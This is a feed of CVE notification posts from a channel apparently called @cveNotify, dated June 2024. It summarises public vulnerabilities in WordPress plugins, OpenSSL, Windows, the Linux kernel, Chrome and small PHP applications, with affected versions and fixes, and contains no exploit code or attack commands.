🚨 CVE-2024-5791The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wp_id' parameter in all versions up to, and including, 4.4.2 due to missing authorization checks on processAction function, as well as insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a wp-admin dashboard.🎖@cveNotify |
|
| 2024-06-22 02:37:25 |
🚨 CVE-2024-2484The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Services and Post Type Grid widgets in all versions up to, and including, 2.10.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-22 02:37:24 |
🚨 CVE-2024-27834The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, Safari 17.5, watchOS 10.5, macOS Sonoma 14.5. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.🎖@cveNotify |
|
| 2024-06-22 00:37:33 |
🚨 CVE-2024-6120The Sparkle Demo Importer plugin for WordPress is vulnerable to unauthorized database reset and demo data import due to a missing capability check on the multiple functions in all versions up to and including 1.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all posts, pages, and uploaded files, as well as download and install a limited set of demo plugins.🎖@cveNotify |
|
| 2024-06-21 22:37:30 |
🚨 CVE-2024-34452CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document.🎖@cveNotify |
|
| 2024-06-21 22:37:26 |
🚨 CVE-2022-42974In Kostal PIKO 1.5-1 MP plus HMI OEM p 1.0.1, the web application for the Solar Panel is vulnerable to a Stored Cross-Site Scripting (XSS) attack on /file.bootloader.upload.html. The application fails to sanitize the parameter filename, in a POST request to /file.bootloader.upload.html for a system update, thus allowing one to inject HTML and/or JavaScript on the page that will then be processed and stored by the application. Any subsequent requests to pages that retrieve the malicious content will automatically exploit the vulnerability on the victim's browser. This also happens because the tag is loaded in the function innerHTML in the page HTML.🎖@cveNotify |
|
| 2024-06-21 22:37:25 |
🚨 CVE-2024-29025Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `HttpPostRequestDecoder` can be tricked to accumulate data. While the decoder can store items on the disk if configured so, there are no limits to the number of fields the form can have, an attacher can send a chunked post consisting of many small fields that will be accumulated in the `bodyListHttpData` list. The decoder cumulates bytes in the `undecodedChunk` buffer until it can decode a field, this field can cumulate data without limits. This vulnerability is fixed in 4.1.108.Final.🎖@cveNotify |
|
| 2024-06-21 22:37:24 |
🚨 CVE-2024-27622A remote code execution vulnerability has been identified in the User Defined Tags module of CMS Made Simple version 2.2.19 / 2.2.21. This vulnerability arises from inadequate sanitization of user-supplied input in the 'Code' section of the module. As a result, authenticated users with administrative privileges can inject and execute arbitrary PHP code.🎖@cveNotify |
|
| 2024-06-21 20:37:24 |
🚨 CVE-2020-27352When generating the systemd service units for the docker snap (and other similar snaps), snapd does not specify Delegate=yes - as a result systemd will move processes from the containers created and managed by these snaps into the cgroup of the main daemon within the snap itself when reloading system units. This may grant additional privileges to a container within the snap that were not originally intended.🎖@cveNotify |
|
| 2024-06-21 20:07:25 |
🚨 CVE-2024-30077Windows OLE Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-21 20:07:24 |
🚨 CVE-2024-30076Windows Container Manager Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-21 19:37:48 |
🚨 CVE-2021-35559Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-06-21 19:37:47 |
🚨 CVE-2021-35550Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-06-21 19:37:46 |
🚨 CVE-2021-23445This affects the package datatables.net before 1.11.3. If an array is passed to the HTML escape entities function it would not have its contents escaped.🎖@cveNotify |
|
| 2024-06-21 19:37:42 |
🚨 CVE-2021-3712ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).🎖@cveNotify |
|
| 2024-06-21 19:37:41 |
🚨 CVE-2021-3711In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).🎖@cveNotify |
|
| 2024-06-21 19:37:40 |
🚨 CVE-2021-28167In Eclipse Openj9 to version 0.25.0, usage of the jdk.internal.reflect.ConstantPool API causes the JVM in some cases to pre-resolve certain constant pool entries. This allows a user to call static methods or access static members without running the class initialization method, and may allow a user to observe uninitialized values.🎖@cveNotify |
|
| 2024-06-21 19:37:38 |
🚨 CVE-2021-3449An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).🎖@cveNotify |
|
| 2024-06-21 19:37:34 |
🚨 CVE-2021-23841The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).🎖@cveNotify |
|
| 2024-06-21 19:37:33 |
🚨 CVE-2021-23840Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).🎖@cveNotify |
|
| 2024-06-21 19:37:32 |
🚨 CVE-2020-28458All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.🎖@cveNotify |
|
| 2024-06-21 19:37:27 |
🚨 CVE-2020-1971The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).🎖@cveNotify |
|
| 2024-06-21 19:07:32 |
🚨 CVE-2024-30094Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-21 19:07:31 |
🚨 CVE-2024-30091Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-21 19:07:27 |
🚨 CVE-2024-30086Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-21 19:07:26 |
🚨 CVE-2024-30084Windows Kernel-Mode Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-21 19:07:24 |
🚨 CVE-2024-30083Windows Standards-Based Storage Management Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-06-21 18:37:25 |
🚨 CVE-2024-30087Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-21 18:37:24 |
🚨 CVE-2024-5352A vulnerability was found in anji-plus AJ-Report up to 1.4.1. It has been rated as critical. Affected by this issue is the function validationRules of the component com.anjiplus.template.gaea.business.modules.datasetparam.controller.DataSetParamController#verification. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266264.🎖@cveNotify |
|
| 2024-06-21 17:37:32 |
🚨 CVE-2024-37675Cross Site Scripting vulnerability in Tessi Docubase Document Management product 5.x allows a remote attacker to execute arbitrary code via the parameter "sectionContent" related to the functionality of adding notes to an uploaded file.🎖@cveNotify |
|
| 2024-06-21 17:37:31 |
🚨 CVE-2024-37673Cross Site Scripting vulnerability in Tessi Docubase Document Management product 5.x allows a remote attacker to execute arbitrary code via the filename parameter.🎖@cveNotify |
|
| 2024-06-21 17:37:27 |
🚨 CVE-2024-37671Cross Site Scripting vulnerability in Tessi Docubase Document Management product 5.x allows a remote attacker to execute arbitrary code via the page parameter.🎖@cveNotify |
|
| 2024-06-21 17:37:26 |
🚨 CVE-2024-6196A vulnerability was found in itsourcecode Banking Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269168.🎖@cveNotify |
|
| 2024-06-21 17:37:24 |
🚨 CVE-2024-5264Network Transfer with AES KHT in Thales Luna EFT 2.1 and above allows a user with administrative console access to access backups taken via offline analysis🎖@cveNotify |
|
| 2024-06-21 15:37:27 |
🚨 CVE-2023-45197The file upload plugin in Adminer and AdminerEvo allows an attacker to upload a file with a table name of “..” to the root of the Adminer directory. The attacker can effectively guess the name of the uploaded file and execute it. Adminer is no longer supported, but this issue was fixed in AdminerEvo version 4.8.3.🎖@cveNotify |
|
| 2024-06-21 15:37:26 |
🚨 CVE-2024-6218A vulnerability, which was classified as critical, has been found in itsourcecode Vehicle Management System 1.0. Affected by this issue is some unknown functionality of the file busprofile.php. The manipulation of the argument busid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-269282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-21 15:37:25 |
🚨 CVE-2024-6212A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. Affected by this issue is the function get_student of the file student_form.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269276.🎖@cveNotify |
|
| 2024-06-21 15:37:24 |
🚨 CVE-2023-32123Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 allows Stored XSS.This issue affects The7: from n/a through 11.7.3.🎖@cveNotify |
|
| 2024-06-21 14:37:46 |
🚨 CVE-2024-6240Improper privilege management vulnerability in Parallels Desktop Software, which affects versions earlier than 19.3.0. An attacker could add malicious code in a script and populate the BASH_ENV environment variable with the path to the malicious script, executing on application startup. An attacker could exploit this vulnerability to escalate privileges on the system.🎖@cveNotify |
|
| 2024-06-21 14:37:45 |
🚨 CVE-2024-37230Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Book Landing Page.This issue affects Book Landing Page: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-06-21 14:37:44 |
🚨 CVE-2024-37227Cross Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters.This issue affects Newsletters: from n/a through 4.9.7.🎖@cveNotify |
|
| 2024-06-21 14:37:40 |
🚨 CVE-2024-37212Cross-Site Request Forgery (CSRF) vulnerability in Ali2Woo Ali2Woo Lite.This issue affects Ali2Woo Lite: from n/a through 3.3.5.🎖@cveNotify |
|
| 2024-06-21 14:37:39 |
🚨 CVE-2024-37118Cross Site Request Forgery (CSRF) vulnerability in Uncanny Owl Uncanny Automator Pro.This issue affects Uncanny Automator Pro: from n/a through 5.3.🎖@cveNotify |
|
| 2024-06-21 14:37:38 |
🚨 CVE-2022-45803Missing Authorization vulnerability in Nikolay Strikhar WordPress Form Builder Plugin – Gutenberg Forms.This issue affects WordPress Form Builder Plugin – Gutenberg Forms: from n/a through 2.2.8.3.🎖@cveNotify |
|
| 2024-06-21 14:37:34 |
🚨 CVE-2022-43453Missing Authorization vulnerability in Bill Minozzi WP Tools.This issue affects WP Tools: from n/a through 3.41.🎖@cveNotify |
|
| 2024-06-21 14:37:33 |
🚨 CVE-2024-36978In the Linux kernel, the following vulnerability has been resolved:net: sched: sch_multiq: fix possible OOB write in multiq_tune()q->bands will be assigned to qopt->bands to execute subsequent code logicafter kmalloc. So the old q->bands should not be used in kmalloc.Otherwise, an out-of-bounds write will occur.🎖@cveNotify |
|
| 2024-06-21 14:37:32 |
🚨 CVE-2024-36973In the Linux kernel, the following vulnerability has been resolved:misc: microchip: pci1xxxx: fix double free in the error handling of gp_aux_bus_probe()When auxiliary_device_add() returns error and then callsauxiliary_device_uninit(), callback functiongp_auxiliary_device_release() calls ida_free() andkfree(aux_device_wrapper) to free memory. We should'tcall them again in the error handling path.Fix this by skipping the redundant cleanup functions.🎖@cveNotify |
|
| 2024-06-21 14:37:28 |
🚨 CVE-2024-36894In the Linux kernel, the following vulnerability has been resolved:usb: gadget: f_fs: Fix race between aio_cancel() and AIO request completeFFS based applications can utilize the aio_cancel() callback to dequeuepending USB requests submitted to the UDC. There is a scenario where theFFS application issues an AIO cancel call, while the UDC is handling asoft disconnect. For a DWC3 based implementation, the callstack lookslike the following: DWC3 Gadget FFS Applicationdwc3_gadget_soft_disconnect() ... --> dwc3_stop_active_transfers() --> dwc3_gadget_giveback(-ESHUTDOWN) --> ffs_epfile_async_io_complete() ffs_aio_cancel() --> usb_ep_free_request() --> usb_ep_dequeue()There is currently no locking implemented between the AIO completionhandler and AIO cancel, so the issue occurs if the completion routine isrunning in parallel to an AIO cancel call coming from the FFS application.As the completion call frees the USB request (io_data->req) the FFSapplication is also referencing it for the usb_ep_dequeue() call. This canlead to accessing a stale/hanging pointer.commit b566d38857fc ("usb: gadget: f_fs: use io_data->status consistently")relocated the usb_ep_free_request() into ffs_epfile_async_io_complete().However, in order to properly implement locking to mitigate this issue, thespinlock can't be added to ffs_epfile_async_io_complete(), asusb_ep_dequeue() (if successfully dequeuing a USB request) will call thefunction driver's completion handler in the same context. Hence, leadinginto a deadlock.Fix this issue by moving the usb_ep_free_request() back toffs_user_copy_worker(), and ensuring that it explicitly sets io_data->reqto NULL after freeing it within the ffs->eps_lock. This resolves the racecondition above, as the ffs_aio_cancel() routine will not continueattempting to dequeue a request that has already been freed, or theffs_user_copy_work() not freeing the USB request until the AIO cancel isdone referencing it.This fix depends on commit b566d38857fc ("usb: gadget: f_fs: use io_data->status consistently")🎖@cveNotify |
|
| 2024-06-21 14:37:27 |
🚨 CVE-2024-27022In the Linux kernel, the following vulnerability has been resolved:fork: defer linking file vma until vma is fully initializedThorvald reported a WARNING [1]. And the root cause is below race: CPU 1 CPU 2 fork hugetlbfs_fallocate dup_mmap hugetlbfs_punch_hole i_mmap_lock_write(mapping); vma_interval_tree_insert_after -- Child vma is visible through i_mmap tree. i_mmap_unlock_write(mapping); hugetlb_dup_vma_private -- Clear vma_lock outside i_mmap_rwsem! i_mmap_lock_write(mapping); hugetlb_vmdelete_list vma_interval_tree_foreach hugetlb_vma_trylock_write -- Vma_lock is cleared. tmp->vm_ops->open -- Alloc new vma_lock outside i_mmap_rwsem! hugetlb_vma_unlock_write -- Vma_lock is assigned!!! i_mmap_unlock_write(mapping);hugetlb_dup_vma_private() and hugetlb_vm_op_open() are called outsidei_mmap_rwsem lock while vma lock can be used in the same time. Fix thisby deferring linking file vma until vma is fully initialized. Those vmasshould be initialized first before they can be used.🎖@cveNotify |
|
| 2024-06-21 14:37:26 |
🚨 CVE-2024-26629In the Linux kernel, the following vulnerability has been resolved:nfsd: fix RELEASE_LOCKOWNERThe test on so_count in nfsd4_release_lockowner() is nonsense andharmful. Revert to using check_for_locks(), changing that to not sleep.First: harmful.As is documented in the kdoc comment for nfsd4_release_lockowner(), thetest on so_count can transiently return a false positive resulting in areturn of NFS4ERR_LOCKS_HELD when in fact no locks are held. This isclearly a protocol violation and with the Linux NFS client it can causeincorrect behaviour.If RELEASE_LOCKOWNER is sent while some other thread is stillprocessing a LOCK request which failed because, at the time that requestwas received, the given owner held a conflicting lock, then the nfsdthread processing that LOCK request can hold a reference (conflock) tothe lock owner that causes nfsd4_release_lockowner() to return anincorrect error.The Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because itnever sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, soit knows that the error is impossible. It assumes the lock owner was infact released so it feels free to use the same lock owner identifier insome later locking request.When it does reuse a lock owner identifier for which a previous RELEASEfailed, it will naturally use a lock_seqid of zero. However the server,which didn't release the lock owner, will expect a larger lock_seqid andso will respond with NFS4ERR_BAD_SEQID.So clearly it is harmful to allow a false positive, which testingso_count allows.The test is nonsense because ... well... it doesn't mean anything.so_count is the sum of three different counts.1/ the set of states listed on so_stateids2/ the set of active vfs locks owned by any of those states3/ various transient counts such as for conflicting locks.When it is tested against '2' it is clear that one of these is thetransient reference obtained by find_lockowner_str_locked(). It is notclear what the other one is expected to be.In practice, the count is often 2 because there is precisely one stateon so_stateids. If there were more, this would fail.In my testing I see two circumstances when RELEASE_LOCKOWNER is called.In one case, CLOSE is called before RELEASE_LOCKOWNER. That results inall the lock states being removed, and so the lockowner being discarded(it is removed when there are no more references which usually happenswhen the lock state is discarded). When nfsd4_release_lockowner() findsthat the lock owner doesn't exist, it returns success.The other case shows an so_count of '2' and precisely one state listedin so_stateid. It appears that the Linux client uses a separate lockowner for each file resulting in one lock state per lock owner, so thistest on '2' is safe. For another client it might not be safe.So this patch changes check_for_locks() to use the (newish)find_any_file_locked() so that it doesn't take a reference on thenfs4_file and so never calls nfsd_file_put(), and so never sleeps. Withthis check is it safe to restore the use of check_for_locks() ratherthan testing so_count against the mysterious '2'.🎖@cveNotify |
|
| 2024-06-21 14:37:25 |
🚨 CVE-2021-47107In the Linux kernel, the following vulnerability has been resolved:NFSD: Fix READDIR buffer overflowIf a client sends a READDIR count argument that is too small (say,zero), then the buffer size calculation in the new init_dirlisthelper functions results in an underflow, allowing the XDR streamfunctions to write beyond the actual buffer.This calculation has always been suspect. NFSD has never sanity-checked the READDIR count argument, but the old entry encodersmanaged the problem correctly.With the commits below, entry encoding changed, exposing theunderflow to the pointer arithmetic in xdr_reserve_space().Modern NFS clients attempt to retrieve as much data as possiblefor each READDIR request. Also, we have no unit tests thatexercise the behavior of READDIR at the lower bound of @countvalues. Thus this case was missed during testing.🎖@cveNotify |
|
| 2024-06-21 13:37:45 |
🚨 CVE-2024-5059Exposure of Sensitive Information to an Unauthorized Actor vulnerability in A WP Life Event Management Tickets Booking.This issue affects Event Management Tickets Booking: from n/a through 1.4.0.🎖@cveNotify |
|
| 2024-06-21 13:37:44 |
🚨 CVE-2024-35772Cross-Site Request Forgery (CSRF) vulnerability in presscustomizr Hueman.This issue affects Hueman: from n/a through 3.7.24.🎖@cveNotify |
|
| 2024-06-21 13:37:43 |
🚨 CVE-2024-35771Cross-Site Request Forgery (CSRF) vulnerability in presscustomizr Customizr.This issue affects Customizr: from n/a through 4.4.21.🎖@cveNotify |
|
| 2024-06-21 13:37:42 |
🚨 CVE-2024-35770Cross-Site Request Forgery (CSRF) vulnerability in Dave Kiss Vimeography: Vimeo Video Gallery WordPress Plugin.This issue affects Vimeography: Vimeo Video Gallery WordPress Plugin: from n/a through 2.4.1.🎖@cveNotify |
|
| 2024-06-21 13:37:39 |
🚨 CVE-2024-35768Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Live Composer Team Page Builder: Live Composer allows Stored XSS.This issue affects Page Builder: Live Composer: from n/a through 1.5.42.🎖@cveNotify |
|
| 2024-06-21 13:37:38 |
🚨 CVE-2024-35766Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ollybach WPPizza allows Reflected XSS.This issue affects WPPizza: from n/a through 3.18.13.🎖@cveNotify |
|
| 2024-06-21 13:37:37 |
🚨 CVE-2024-35763Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Excellent allows Stored XSS.This issue affects Excellent: from n/a through 1.2.9.🎖@cveNotify |
|
| 2024-06-21 13:37:36 |
🚨 CVE-2024-35762Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Cryout Creations Serious Slider allows Stored XSS.This issue affects Serious Slider: from n/a through 1.2.4.🎖@cveNotify |
|
| 2024-06-21 13:37:32 |
🚨 CVE-2024-35761Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in vCita Online Booking & Scheduling Calendar for WordPress by vcita allows Stored XSS.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through 4.4.0.🎖@cveNotify |
|
| 2024-06-21 13:37:31 |
🚨 CVE-2024-35759Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Job Portal allows Stored XSS.This issue affects WP Job Portal: from n/a through 2.1.3.🎖@cveNotify |
|
| 2024-06-21 13:37:30 |
🚨 CVE-2024-35757Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in 5 Star Plugins Easy Age Verify allows Stored XSS.This issue affects Easy Age Verify: from n/a through 1.8.2.🎖@cveNotify |
|
| 2024-06-21 13:37:26 |
🚨 CVE-2024-6102Out of bounds memory access in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-21 13:37:25 |
🚨 CVE-2024-6100Type Confusion in V8 in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-21 13:37:24 |
🚨 CVE-2024-5171Integer overflow in libaom internal function img_alloc_helper can lead to heap buffer overflow. This function can be reached via 3 callers: * Calling aom_img_alloc() with a large value of the d_w, d_h, or align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid. * Calling aom_img_wrap() with a large value of the d_w, d_h, or align parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid. * Calling aom_img_alloc_with_border() with a large value of the d_w, d_h, align, size_align, or border parameter may result in integer overflows in the calculations of buffer sizes and offsets and some fields of the returned aom_image_t struct may be invalid.🎖@cveNotify |
|
| 2024-06-21 11:37:38 |
🚨 CVE-2024-37343There is a cross-site scripting vulnerability in the SecureAccess administrative console of Absolute Secure Access prior to version 13.06.Attackers with valid tunnel credentials can pass a limited-length script to theadministrative console which is then temporarily stored where an administratorusing a non-default configuration could click on it while the attacker has avalid tunnel session with the server. The scope is unchanged, there is no lossof confidentiality. Impact to system availability is none, impact to systemintegrity is high.🎖@cveNotify |
|
| 2024-06-21 11:37:31 |
🚨 CVE-2022-45929Northern.tech Mender 3.3.x before 3.3.2, 3.5.x before 3.5.0, and 3.6.x before 3.6.0 has Incorrect Access Control and allows users to change their roles and could allow privilege escalation from a low-privileged read-only user to a high-privileged user.🎖@cveNotify |
|
| 2024-06-21 11:37:30 |
🚨 CVE-2024-6196A vulnerability was found in itsourcecode Banking Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269168.🎖@cveNotify |
|
| 2024-06-21 11:37:26 |
🚨 CVE-2024-6194A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. Affected is an unknown function of the file editmeasurement.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269166 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-21 11:37:25 |
🚨 CVE-2024-37676An issue in htop-dev htop v.2.20 allows a local attacker to cause an out-of-bounds access in the Header_populateFromSettings function.🎖@cveNotify |
|
| 2024-06-21 11:37:24 |
